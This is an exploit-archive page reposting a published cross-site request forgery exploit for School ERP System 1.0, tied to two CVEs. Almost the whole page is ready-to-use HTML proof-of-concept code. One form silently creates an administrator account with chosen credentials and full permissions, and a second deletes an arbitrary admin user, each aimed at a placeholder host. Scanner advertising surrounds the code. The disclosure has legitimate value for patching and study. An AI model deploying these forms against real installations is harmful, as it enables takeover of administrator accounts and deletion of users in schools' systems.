Registerschool erp system 1.0 cross site request forgery (add admin)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin) # Date: 2020-01-31 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ # Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/ # Version ERP-Ultimate # CVE: CVE-2020-8504,CVE-2020-8505 # Tested on Windows 10/Kali Rolling # The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery # that leads to admin account creation and arbitrary user deletion. # Proof of Concept for the Admin Account Creation: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST"> <input type="hidden" name="admin_fname" value="Admin" /> <input type="hidden" name="admin_lname" value="Tester" /> <input type="hidden" name="admin_username" value="testing" /> <input type="hidden" name="admin_password" value="testing123" /> <input type="hidden" name="admin_password2" value="testing123" /> <input type="hidden" name="admin_email" value="test@test.com" /> <input type="hidden" name="admin_phoneno" value="9999999999" /> <input type="hidden" name="adminlevel" value="" /> <input type="hidden" name="admin_more" value="Test" /> <input type="hidden" name="1_p" value="1_p" /> <input type="hidden" name="1_1" value="1_1" /> <input type="hidden" name="1_2" value="1_2" /> <input type="hidden" name="1_4" value="1_4" /> <input type="hidden" name="1_3" value="1_3" /> <input type="hidden" name="2_p" value="2_p" /> <input type="hidden" name="2_1" value="2_1" /> <input type="hidden" name="2_2" value="2_2" /> <input type="hidden" name="2_3" value="2_3" /> <input type="hidden" name="2_4" value="2_4" /> <input type="hidden" name="2_5" value="2_5" /> <input type="hidden" name="2_6" value="2_6" /> <input type="hidden" name="2_7" value="2_7" /> <input type="hidden" name="2_8" value="2_8" /> <input type="hidden" name="2_9" value="2_9" /> <input type="hidden" name="2_10" value="2_10" /> <input type="hidden" name="2_11" value="2_11" /> <input type="hidden" name="2_12" value="2_12" /> <input type="hidden" name="2_13" value="2_13" /> <input type="hidden" name="2_14" value="2_14" /> <input type="hidden" name="2_15" value="2_15" /> <input type="hidden" name="2_20" value="2_20" /> <input type="hidden" name="2_18" value="2_18" /> <input type="hidden" name="2_19" value="2_19" /> <input type="hidden" name="3_p" value="3_p" /> <input type="hidden" name="3_1" value="3_1" /> <input type="hidden" name="3_2" value="3_2" /> <input type="hidden" name="3_3" value="3_3" /> <input type="hidden" name="3_5" value="3_5" /> <input type="hidden" name="3_4" value="3_4" /> <input type="hidden" name="4_p" value="4_p" /> <input type="hidden" name="5_p" value="5_p" /> <input type="hidden" name="5_1" value="5_1" /> <input type="hidden" name="5_3" value="5_3" /> <input type="hidden" name="5_2" value="5_2" /> <input type="hidden" name="5_5" value="5_5" /> <input type="hidden" name="5_6" value="5_6" /> <input type="hidden" name="6_p" value="6_p" /> <input type="hidden" name="7_p" value="7_p" /> <input type="hidden" name="7_1" value="7_1" /> <input type="hidden" name="7_2" value="7_2" /> <input type="hidden" name="7_3" value="7_3" /> <input type="hidden" name="7_4" value="7_4" /> <input type="hidden" name="7_5" value="7_5" /> <input type="hidden" name="8_p" value="8_p" /> <input type="hidden" name="8_1" value="8_1" /> <input type="hidden" name="8_2" value="8_2" /> <input type="hidden" name="8_3" value="8_3" /> <input type="hidden" name="8_101" value="8_101" /> <input type="hidden" name="8_4" value="8_4" /> <input type="hidden" name="8_5" value="8_5" /> <input type="hidden" name="8_6" value="8_6" /> <input type="hidden" name="8_16" value="8_16" /> <input type="hidden" name="8_102" value="8_102" /> <input type="hidden" name="8_7" value="8_7" /> <input type="hidden" name="8_8" value="8_8" /> <input type="hidden" name="8_9" value="8_9" /> <input type="hidden" name="8_17" value="8_17" /> <input type="hidden" name="8_103" value="8_103" /> <input type="hidden" name="8_104" value="8_104" /> <input type="hidden" name="8_10" value="8_10" /> <input type="hidden" name="8_11" value="8_11" /> <input type="hidden" name="8_12" value="8_12" /> <input type="hidden" name="8_18" value="8_18" /> <input type="hidden" name="8_105" value="8_105" /> <input type="hidden" name="8_106" value="8_106" /> <input type="hidden" name="8_13" value="8_13" /> <input type="hidden" name="8_14" value="8_14" /> <input type="hidden" name="8_15" value="8_15" /> <input type="hidden" name="8_19" value="8_19" /> <input type="hidden" name="8_107" value="8_107" /> <input type="hidden" name="8_108" value="8_108" /> <input type="hidden" name="9_p" value="9_p" /> <input type="hidden" name="9_1" value="9_1" /> <input type="hidden" name="9_17" value="9_17" /> <input type="hidden" name="9_18" value="9_18" /> <input type="hidden" name="9_19" value="9_19" /> <input type="hidden" name="9_2" value="9_2" /> <input type="hidden" name="9_20" value="9_20" /> <input type="hidden" name="9_21" value="9_21" /> <input type="hidden" name="9_22" value="9_22" /> <input type="hidden" name="9_3" value="9_3" /> <input type="hidden" name="9_4" value="9_4" /> <input type="hidden" name="9_5" value="9_5" /> <input type="hidden" name="9_6" value="9_6" /> <input type="hidden" name="9_101" value="9_101" /> <input type="hidden" name="9_7" value="9_7" /> <input type="hidden" name="9_102" value="9_102" /> <input type="hidden" name="9_8" value="9_8" /> <input type="hidden" name="9_103" value="9_103" /> <input type="hidden" name="9_24" value="9_24" /> <input type="hidden" name="9_25" value="9_25" /> <input type="hidden" name="9_33" value="9_33" /> <input type="hidden" name="9_23" value="9_23" /> <input type="hidden" name="9_11" value="9_11" /> <input type="hidden" name="9_13" value="9_13" /> <input type="hidden" name="9_27" value="9_27" /> <input type="hidden" name="9_14" value="9_14" /> <input type="hidden" name="9_29" value="9_29" /> <input type="hidden" name="9_30" value="9_30" /> <input type="hidden" name="9_31" value="9_31" /> <input type="hidden" name="9_15" value="9_15" /> <input type="hidden" name="9_16" value="9_16" /> <input type="hidden" name="9_32" value="9_32" /> <input type="hidden" name="10_p" value="10_p" /> <input type="hidden" name="10_1" value="10_1" /> <input type="hidden" name="10_2" value="10_2" /> <input type="hidden" name="10_3" value="10_3" /> <input type="hidden" name="10_4" value="10_4" /> <input type="hidden" name="10_5" value="10_5" /> <input type="hidden" name="10_6" value="10_6" /> <input type="hidden" name="10_7" value="10_7" /> <input type="hidden" name="10_8" value="10_8" /> <input type="hidden" name="10_11" value="10_11" /> <input type="hidden" name="10_9" value="10_9" /> <input type="hidden" name="10_10" value="10_10" /> <input type="hidden" name="10_12" value="10_12" /> <input type="hidden" name="11_p" value="11_p" /> <input type="hidden" name="11_1" value="11_1" /> <input type="hidden" name="11_2" value="11_2" /> <input type="hidden" name="11_3" value="11_3" /> <input type="hidden" name="11_4" value="11_4" /> <input type="hidden" name="11_5" value="11_5" /> <input type="hidden" name="11_6" value="11_6" /> <input type="hidden" name="11_7" value="11_7" /> <input type="hidden" name="11_8" value="11_8" /> <input type="hidden" name="11_9" value="11_9" /> <input type="hidden" name="11_10" value="11_10" /> <input type="hidden" name="11_11" value="11_11" /> <input type="hidden" name="11_12" value="11_12" /> <input type="hidden" name="11_13" value="11_13" /> <input type="hidden" name="11_14" value="11_14" /> <input type="hidden" name="11_15" value="11_15" /> <input type="hidden" name="11_16" value="11_16" /> <input type="hidden" name="11_17" value="11_17" /> <input type="hidden" name="11_18" value="11_18" /> <input type="hidden" name="11_19" value="11_19" /> <input type="hidden" name="11_20" value="11_20" /> <input type="hidden" name="11_21" value="11_21" /> <input type="hidden" name="11_23" value="11_23" /> <input type="hidden" name="11_101" value="11_101" /> <input type="hidden" name="11_102" value="11_102" /> <input type="hidden" name="11_22" value="11_22" /> <input type="hidden" name="11_103" value="11_103" /> <input type="hidden" name="11_104" value="11_104" /> <input type="hidden" name="12_p" value="12_p" /> <input type="hidden" name="12_1" value="12_1" /> <input type="hidden" name="12_2" value="12_2" /> <input type="hidden" name="12_3" value="12_3" /> <input type="hidden" name="12_4" value="12_4" /> <input type="hidden" name="12_5" value="12_5" /> <input type="hidden" name="12_11" value="12_11" /> <input type="hidden" name="12_6" value="12_6" /> <input type="hidden" name="12_7" value="12_7" /> <input type="hidden" name="12_8" value="12_8" /> <input type="hidden" name="12_12" value="12_12" /> <input type="hidden" name="12_9" value="12_9" /> <input type="hidden" name="12_10" value="12_10" /> <input type="hidden" name="13_p" value="13_p" /> <input type="hidden" name="13_1" value="13_1" /> <input type="hidden" name="13_2" value="13_2" /> <input type="hidden" name="13_3" value="13_3" /> <input type="hidden" name="13_17" value="13_17" /> <input type="hidden" name="13_4" value="13_4" /> <input type="hidden" name="13_5" value="13_5" /> <input type="hidden" name="13_6" value="13_6" /> <input type="hidden" name="13_18" value="13_18" /> <input type="hidden" name="13_7" value="13_7" /> <input type="hidden" name="13_8" value="13_8" /> <input type="hidden" name="13_9" value="13_9" /> <input type="hidden" name="13_19" value="13_19" /> <input type="hidden" name="13_20" value="13_20" /> <input type="hidden" name="13_10" value="13_10" /> <input type="hidden" name="13_11" value="13_11" /> <input type="hidden" name="13_12" value="13_12" /> <input type="hidden" name="13_21" value="13_21" /> <input type="hidden" name="13_22" value="13_22" /> <input type="hidden" name="13_13" value="13_13" /> <input type="hidden" name="13_14" value="13_14" /> <input type="hidden" name="13_15" value="13_15" /> <input type="hidden" name="13_16" value="13_16" /> <input type="hidden" name="13_108" value="13_108" /> <input type="hidden" name="13_23" value="13_23" /> <input type="hidden" name="13_101" value="13_101" /> <input type="hidden" name="13_102" value="13_102" /> <input type="hidden" name="13_103" value="13_103" /> <input type="hidden" name="13_104" value="13_104" /> <input type="hidden" name="13_106" value="13_106" /> <input type="hidden" name="13_105" value="13_105" /> <input type="hidden" name="14_p" value="14_p" /> <input type="hidden" name="14_1" value="14_1" /> <input type="hidden" name="14_2" value="14_2" /> <input type="hidden" name="14_3" value="14_3" /> <input type="hidden" name="14_101" value="14_101" /> <input type="hidden" name="14_4" value="14_4" /> <input type="hidden" name="14_5" value="14_5" /> <input type="hidden" name="14_6" value="14_6" /> <input type="hidden" name="14_102" value="14_102" /> <input type="hidden" name="14_7" value="14_7" /> <input type="hidden" name="14_8" value="14_8" /> <input type="hidden" name="14_9" value="14_9" /> <input type="hidden" name="14_103" value="14_103" /> <input type="hidden" name="14_10" value="14_10" /> <input type="hidden" name="14_21" value="14_21" /> <input type="hidden" name="14_104" value="14_104" /> <input type="hidden" name="14_11" value="14_11" /> <input type="hidden" name="14_105" value="14_105" /> <input type="hidden" name="14_12" value="14_12" /> <input type="hidden" name="14_106" value="14_106" /> <input type="hidden" name="14_13" value="14_13" /> <input type="hidden" name="14_14" value="14_14" /> <input type="hidden" name="14_15" value="14_15" /> <input type="hidden" name="14_16" value="14_16" /> <input type="hidden" name="14_107" value="14_107" /> <input type="hidden" name="14_17" value="14_17" /> <input type="hidden" name="14_18" value="14_18" /> <input type="hidden" name="14_19" value="14_19" /> <input type="hidden" name="14_20" value="14_20" /> <input type="hidden" name="15_p" value="15_p" /> <input type="hidden" name="15_1" value="15_1" /> <input type="hidden" name="15_2" value="15_2" /> <input type="hidden" name="15_3" value="15_3" /> <input type="hidden" name="16_p" value="16_p" /> <input type="hidden" name="16_1" value="16_1" /> <input type="hidden" name="16_2" value="16_2" /> <input type="hidden" name="16_3" value="16_3" /> <input type="hidden" name="16_101" value="16_101" /> <input type="hidden" name="16_4" value="16_4" /> <input type="hidden" name="16_5" value="16_5" /> <input type="hidden" name="16_6" value="16_6" /> <input type="hidden" name="16_102" value="16_102" /> <input type="hidden" name="16_7" value="16_7" /> <input type="hidden" name="16_8" value="16_8" /> <input type="hidden" name="16_10" value="16_10" /> <input type="hidden" name="16_11" value="16_11" /> <input type="hidden" name="16_12" value="16_12" /> <input type="hidden" name="16_103" value="16_103" /> <input type="hidden" name="16_13" value="16_13" /> <input type="hidden" name="16_14" value="16_14" /> <input type="hidden" name="16_15" value="16_15" /> <input type="hidden" name="16_17" value="16_17" /> <input type="hidden" name="16_18" value="16_18" /> <input type="hidden" name="16_20" value="16_20" /> <input type="hidden" name="16_21" value="16_21" /> <input type="hidden" name="16_24" value="16_24" /> <input type="hidden" name="16_104" value="16_104" /> <input type="hidden" name="16_105" value="16_105" /> <input type="hidden" name="16_22" value="16_22" /> <input type="hidden" name="16_25" value="16_25" /> <input type="hidden" name="16_23" value="16_23" /> <input type="hidden" name="16_26" value="16_26" /> <input type="hidden" name="16_106" value="16_106" /> <input type="hidden" name="16_107" value="16_107" /> <input type="hidden" name="16_27" value="16_27" /> <input type="hidden" name="16_28" value="16_28" /> <input type="hidden" name="16_29" value="16_29" /> <input type="hidden" name="17_p" value="17_p" /> <input type="hidden" name="17_1" value="17_1" /> <input type="hidden" name="17_6" value="17_6" /> <input type="hidden" name="17_2" value="17_2" /> <input type="hidden" name="17_3" value="17_3" /> <input type="hidden" name="17_101" value="17_101" /> <input type="hidden" name="17_4" value="17_4" /> <input type="hidden" name="17_5" value="17_5" /> <input type="hidden" name="17_7" value="17_7" /> <input type="hidden" name="17_8" value="17_8" /> <input type="hidden" name="17_9" value="17_9" /> <input type="hidden" name="18_p" value="18_p" /> <input type="hidden" name="18_5" value="18_5" /> <input type="hidden" name="18_1" value="18_1" /> <input type="hidden" name="18_2" value="18_2" /> <input type="hidden" name="18_3" value="18_3" /> <input type="hidden" name="18_4" value="18_4" /> <input type="hidden" name="18_6" value="18_6" /> <input type="hidden" name="18_7" value="18_7" /> <input type="hidden" name="18_8" value="18_8" /> <input type="hidden" name="18_9" value="18_9" /> <input type="hidden" name="18_10" value="18_10" /> <input type="hidden" name="18_11" value="18_11" /> <input type="hidden" name="18_12" value="18_12" /> <input type="hidden" name="19_p" value="19_p" /> <input type="hidden" name="19_1" value="19_1" /> <input type="hidden" name="19_2" value="19_2" /> <input type="hidden" name="19_3" value="19_3" /> <input type="hidden" name="19_4" value="19_4" /> <input type="hidden" name="19_5" value="19_5" /> <input type="hidden" name="19_6" value="19_6" /> <input type="hidden" name="19_11" value="19_11" /> <input type="hidden" name="19_7" value="19_7" /> <input type="hidden" name="19_12" value="19_12" /> <input type="hidden" name="19_13" value="19_13" /> <input type="hidden" name="19_14" value="19_14" /> <input type="hidden" name="19_15" value="19_15" /> <input type="hidden" name="19_101" value="19_101" /> <input type="hidden" name="19_102" value="19_102" /> <input type="hidden" name="19_8" value="19_8" /> <input type="hidden" name="19_16" value="19_16" /> <input type="hidden" name="19_9" value="19_9" /> <input type="hidden" name="19_10" value="19_10" /> <input type="hidden" name="19_17" value="19_17" /> <input type="hidden" name="19_18" value="19_18" /> <input type="hidden" name="20_p" value="20_p" /> <input type="hidden" name="20_1" value="20_1" /> <input type="hidden" name="20_5" value="20_5" /> <input type="hidden" name="20_101" value="20_101" /> <input type="hidden" name="20_2" value="20_2" /> <input type="hidden" name="20_6" value="20_6" /> <input type="hidden" name="20_102" value="20_102" /> <input type="hidden" name="20_3" value="20_3" /> <input type="hidden" name="20_4" value="20_4" /> <input type="hidden" name="21_p" value="21_p" /> <input type="hidden" name="21_1" value="21_1" /> <input type="hidden" name="21_2" value="21_2" /> <input type="hidden" name="21_3" value="21_3" /> <input type="hidden" name="22_p" value="22_p" /> <input type="hidden" name="22_1" value="22_1" /> <input type="hidden" name="22_2" value="22_2" /> <input type="hidden" name="22_3" value="22_3" /> <input type="hidden" name="22_5" value="22_5" /> <input type="hidden" name="22_4" value="22_4" /> <input type="hidden" name="22_6" value="22_6" /> <input type="hidden" name="23_p" value="23_p" /> <input type="hidden" name="24_p" value="24_p" /> <input type="hidden" name="24_1" value="24_1" /> <input type="hidden" name="24_2" value="24_2" /> <input type="hidden" name="24_3" value="24_3" /> <input type="hidden" name="24_4" value="24_4" /> <input type="hidden" name="25_p" value="25_p" /> <input type="hidden" name="25_1" value="25_1" /> <input type="hidden" name="25_2" value="25_2" /> <input type="hidden" name="25_5" value="25_5" /> <input type="hidden" name="25_6" value="25_6" /> <input type="hidden" name="25_3" value="25_3" /> <input type="hidden" name="25_4" value="25_4" /> <input type="hidden" name="25_7" value="25_7" /> <input type="hidden" name="25_8" value="25_8" /> <input type="hidden" name="26_p" value="26_p" /> <input type="hidden" name="26_1" value="26_1" /> <input type="hidden" name="26_2" value="26_2" /> <input type="hidden" name="27_p" value="27_p" /> <input type="hidden" name="27_1" value="27_1" /> <input type="hidden" name="27_2" value="27_2" /> <input type="hidden" name="27_3" value="27_3" /> <input type="hidden" name="28_p" value="28_p" /> <input type="hidden" name="28_1" value="28_1" /> <input type="hidden" name="28_2" value="28_2" /> <input type="hidden" name="28_3" value="28_3" /> <input type="hidden" name="28_4" value="28_4" /> <input type="hidden" name="28_5" value="28_5" /> <input type="hidden" name="29_p" value="29_p" /> <input type="hidden" name="29_1" value="29_1" /> <input type="hidden" name="29_2" value="29_2" /> <input type="hidden" name="30_p" value="30_p" /> <input type="hidden" name="30_1" value="30_1" /> <input type="hidden" name="30_2" value="30_2" /> <input type="hidden" name="30_3" value="30_3" /> <input type="hidden" name="30_4" value="30_4" /> <input type="hidden" name="30_5" value="30_5" /> <input type="hidden" name="30_6" value="30_6" /> <input type="hidden" name="30_7" value="30_7" /> <input type="hidden" name="30_8" value="30_8" /> <input type="hidden" name="31_p" value="31_p" /> <input type="hidden" name="31_1" value="31_1" /> <input type="hidden" name="31_2" value="31_2" /> <input type="hidden" name="31_3" value="31_3" /> <input type="hidden" name="31_5" value="31_5" /> <input type="hidden" name="31_4" value="31_4" /> <input type="hidden" name="32_p" value="32_p" /> <input type="hidden" name="32_3" value="32_3" /> <input type="hidden" name="32_1" value="32_1" /> <input type="hidden" name="32_4" value="32_4" /> <input type="hidden" name="32_2" value="32_2" /> <input type="hidden" name="32_5" value="32_5" /> <input type="hidden" name="33_p" value="33_p" /> <input type="hidden" name="33_1" value="33_1" /> <input type="hidden" name="33_2" value="33_2" /> <input type="hidden" name="33_3" value="33_3" /> <input type="hidden" name="33_8" value="33_8" /> <input type="hidden" name="33_4" value="33_4" /> <input type="hidden" name="33_5" value="33_5" /> <input type="hidden" name="33_6" value="33_6" /> <input type="hidden" name="33_7" value="33_7" /> <input type="hidden" name="34_p" value="34_p" /> <input type="hidden" name="34_1" value="34_1" /> <input type="hidden" name="34_2" value="34_2" /> <input type="hidden" name="35_p" value="35_p" /> <input type="hidden" name="35_1" value="35_1" /> <input type="hidden" name="35_2" value="35_2" /> <input type="hidden" name="35_3" value="35_3" /> <input type="hidden" name="saveallowance" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html> Proof of Concept for the arbitrary user deletion: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://SITEHERE/office_admin/"> <input type="hidden" name="pid" value="42" /> <input type="hidden" name="action" value="deleteadmin" /> <input type="hidden" name="lid" value="90" /> <input type="submit" value="Submit request" /> </form> </body> </html>
School erp system 1.0 cross site request forgery (add admin) Vulnerability / Exploit Source : School erp system 1.0 cross site request forgery (add admin)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes